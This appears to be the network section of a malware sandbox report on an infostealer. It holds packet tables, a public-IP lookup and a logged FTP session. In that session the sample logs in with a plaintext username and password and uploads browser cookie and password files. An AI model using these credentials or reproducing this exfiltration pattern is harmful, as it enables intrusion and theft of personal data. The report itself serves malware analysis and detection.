                                                                                                                  Jan 10, 2025 19:18:33.367227077 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367331028 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367428064 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367461920 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367559910 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367569923 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367677927 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367762089 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367858887 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.367953062 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368005991 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368067026 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368077040 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368102074 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368112087 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368160009 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368169069 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368206978 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368216991 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368392944 CET5994450042110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.368462086 CET5004259944192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.399065971 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.416876078 CET2150040110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.417121887 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.421977997 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.421998978 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422046900 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422049046 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.422071934 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.422079086 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422091007 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422101974 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422120094 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.422121048 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422141075 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.422177076 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.422194004 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422204018 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422240019 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.422241926 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.422400951 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.426933050 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.426944971 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427012920 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.427037001 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427047014 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427094936 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.427098989 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427110910 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427114010 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.427143097 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.427145004 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427154064 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.427186012 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427194118 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.427239895 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427292109 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427306890 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.427340031 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427419901 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.427423000 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.427510023 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432017088 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432037115 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432077885 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432127953 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432173967 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432193995 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432234049 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432288885 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432322025 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432339907 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432410955 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432421923 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432465076 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432476044 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432526112 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432535887 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432559967 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432569027 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432782888 CET6257050043110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.432845116 CET5004362570192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.461594105 CET5004021192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.569226027 CET2150031110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.569480896 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.574439049 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574450970 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574470997 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574481010 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574489117 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574498892 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574517965 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574542999 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.574589014 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.574594021 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574604988 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574613094 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.574634075 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.574635029 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.574660063 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.574678898 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579348087 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579406023 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579457998 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579468012 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579510927 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579526901 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579530001 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579561949 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579585075 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579597950 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579607964 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579634905 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579653978 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579675913 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579694986 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579714060 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579751968 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579754114 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579766989 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579787970 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.579847097 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.579894066 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.584209919 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584328890 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584330082 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.584355116 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584397078 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.584414005 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.584458113 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584507942 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584517956 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.584542990 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584562063 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584587097 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.584611893 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584726095 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584737062 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.584779024 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589253902 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589277029 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589287043 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589323997 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589334011 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589371920 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589380980 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589456081 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589466095 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589493990 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589633942 CET5041350044110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:33.589674950 CET5004450413192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:33.617810965 CET5003121192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:34.095834970 CET2149759110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:34.146756887 CET2149753110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:34.149044037 CET4975921192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:34.195919037 CET4975321192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:34.208699942 CET2150040110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:34.258420944 CET5004021192.168.2.4110.4.45.197
                                                                                                                  Jan 10, 2025 19:18:34.368439913 CET2150031110.4.45.197192.168.2.4
                                                                                                                  Jan 10, 2025 19:18:34.414740086 CET5003121192.168.2.4110.4.45.197
                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jan 10, 2025 19:16:22.900721073 CET6448353192.168.2.41.1.1.1
                                                                                                                  Jan 10, 2025 19:16:22.908207893 CET53644831.1.1.1192.168.2.4
                                                                                                                  Jan 10, 2025 19:16:25.016216993 CET5650253192.168.2.41.1.1.1
                                                                                                                  Jan 10, 2025 19:16:25.259402990 CET53565021.1.1.1192.168.2.4
                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Jan 10, 2025 19:16:22.900721073 CET192.168.2.41.1.1.10x4c38Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 19:16:25.016216993 CET192.168.2.41.1.1.10x350eStandard query (0)ftp.haliza.com.myA (IP address)IN (0x0001)false
                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Jan 10, 2025 19:16:22.908207893 CET1.1.1.1192.168.2.40x4c38No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 19:16:22.908207893 CET1.1.1.1192.168.2.40x4c38No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 19:16:22.908207893 CET1.1.1.1192.168.2.40x4c38No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                  Jan 10, 2025 19:16:25.259402990 CET1.1.1.1192.168.2.40x350eNo error (0)ftp.haliza.com.my110.4.45.197A (IP address)IN (0x0001)false
                                                                                                                  • api.ipify.org
                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.449735104.26.12.2054437948C:\Users\user\Desktop\s2Jg1MAahY.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 18:16:23 UTC155OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                  Host: api.ipify.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 18:16:23 UTC424INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 18:16:23 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 12
                                                                                                                  Connection: close
                                                                                                                  Vary: Origin
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffea86c7b1ec413-EWR
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1573&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1856325&cwnd=181&unsent_bytes=0&cid=efb3720ebe144b26&ts=385&x=0"
                                                                                                                  2025-01-10 18:16:23 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                  Data Ascii: 8.46.123.189


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.449742104.26.12.2054437436C:\Users\user\AppData\Roaming\GedTanqRR.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 18:16:31 UTC155OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                  Host: api.ipify.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 18:16:31 UTC424INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 18:16:31 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 12
                                                                                                                  Connection: close
                                                                                                                  Vary: Origin
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffea89c3a6318d0-EWR
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1485&min_rtt=1474&rtt_var=575&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1864623&cwnd=191&unsent_bytes=0&cid=735a06f0baba7473&ts=176&x=0"
                                                                                                                  2025-01-10 18:16:31 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                  Data Ascii: 8.46.123.189


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449750104.26.12.2054437960C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 18:16:37 UTC155OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                  Host: api.ipify.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 18:16:37 UTC424INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 18:16:37 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 12
                                                                                                                  Connection: close
                                                                                                                  Vary: Origin
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffea8c4eda7de98-EWR
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1491&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1918528&cwnd=212&unsent_bytes=0&cid=6cbc174811b8c4f8&ts=604&x=0"
                                                                                                                  2025-01-10 18:16:37 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                  Data Ascii: 8.46.123.189


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.449758104.26.12.2054435472C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-10 18:16:46 UTC155OUTGET / HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                  Host: api.ipify.org
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2025-01-10 18:16:46 UTC424INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 10 Jan 2025 18:16:46 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 12
                                                                                                                  Connection: close
                                                                                                                  Vary: Origin
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ffea8f82eae4277-EWR
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1578&rtt_var=654&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1596500&cwnd=197&unsent_bytes=0&cid=6eb1fe12d1014043&ts=738&x=0"
                                                                                                                  2025-01-10 18:16:46 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                  Data Ascii: 8.46.123.189


                                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                  Jan 10, 2025 19:16:26.217956066 CET2149738110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 02:16. Server port: 21.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                  Jan 10, 2025 19:16:26.218301058 CET4973821192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                                  Jan 10, 2025 19:16:26.551255941 CET2149738110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                                  Jan 10, 2025 19:16:26.551418066 CET4973821192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                                  Jan 10, 2025 19:16:26.951740980 CET2149738110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                                  Jan 10, 2025 19:16:27.287350893 CET2149738110.4.45.197192.168.2.4504 Unknown command
                                                                                                                  Jan 10, 2025 19:16:27.288420916 CET4973821192.168.2.4110.4.45.197PWD
                                                                                                                  Jan 10, 2025 19:16:27.611993074 CET2149738110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                                  Jan 10, 2025 19:16:27.612147093 CET4973821192.168.2.4110.4.45.197TYPE I
                                                                                                                  Jan 10, 2025 19:16:27.976144075 CET2149738110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                  Jan 10, 2025 19:16:27.976352930 CET4973821192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:28.299974918 CET2149738110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,219,237)
                                                                                                                  Jan 10, 2025 19:16:28.305877924 CET4973821192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-745481_2025_01_10_13_46_23.txt
                                                                                                                  Jan 10, 2025 19:16:29.157676935 CET2149738110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:29.495646000 CET2149738110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.338 seconds (measured here), 9.70 Kbytes per second
                                                                                                                  Jan 10, 2025 19:16:29.496218920 CET4973821192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:29.820641994 CET2149738110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,242,180)
                                                                                                                  Jan 10, 2025 19:16:29.826813936 CET4973821192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-745481_2025_01_10_19_35_02.txt
                                                                                                                  Jan 10, 2025 19:16:30.672576904 CET2149738110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:30.996934891 CET2149738110.4.45.197192.168.2.4226 File successfully transferred
                                                                                                                  Jan 10, 2025 19:16:33.685415983 CET2149743110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 02:16. Server port: 21.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                                                  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 50 allowed.220-Local time is now 02:16. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                                                  Jan 10, 2025 19:16:33.685688019 CET4974321192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                                                  Jan 10, 2025 19:16:34.012408018 CET2149743110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                                                  Jan 10, 2025 19:16:34.012701035 CET4974321192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                                                  Jan 10, 2025 19:16:34.378088951 CET2149743110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                                                  Jan 10, 2025 19:16:34.705820084 CET2149743110.4.45.197192.168.2.4504 Unknown command
                                                                                                                  Jan 10, 2025 19:16:34.882468939 CET4974321192.168.2.4110.4.45.197PWD
                                                                                                                  Jan 10, 2025 19:16:35.217176914 CET2149743110.4.45.197192.168.2.4257 "/" is your current location
                                                                                                                  Jan 10, 2025 19:16:35.221441031 CET4974321192.168.2.4110.4.45.197TYPE I
                                                                                                                  Jan 10, 2025 19:16:35.568030119 CET2149743110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                                                  Jan 10, 2025 19:16:35.568238020 CET4974321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:35.894321918 CET2149743110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,193,104)
                                                                                                                  Jan 10, 2025 19:16:35.902329922 CET4974321192.168.2.4110.4.45.197STOR PW_user-745481_2025_01_10_13_16_31.html
                                                                                                                  Jan 10, 2025 19:16:36.746552944 CET2149743110.4.45.197192.168.2.4150 Accepted data connection
                                                                                                                  Jan 10, 2025 19:16:37.072251081 CET2149743110.4.45.197192.168.2.4226-File successfully transferred
                                                                                                                  226-File successfully transferred226 0.335 seconds (measured here), 1.01 Kbytes per second
                                                                                                                  Jan 10, 2025 19:16:37.096971035 CET4974321192.168.2.4110.4.45.197PASV
                                                                                                                  Jan 10, 2025 19:16:37.424634933 CET2149743110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,193,68)
                                                                                                                  Jan 10, 2025 19:16:37.869219065 CET4974321192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-745481_2025_01_10_18_35_29.txt
                                                                                                                  Jan 10, 2025 19:16:38.694217920 CET2149743110.4.45.197192.168.2.4150 Accepted data connection
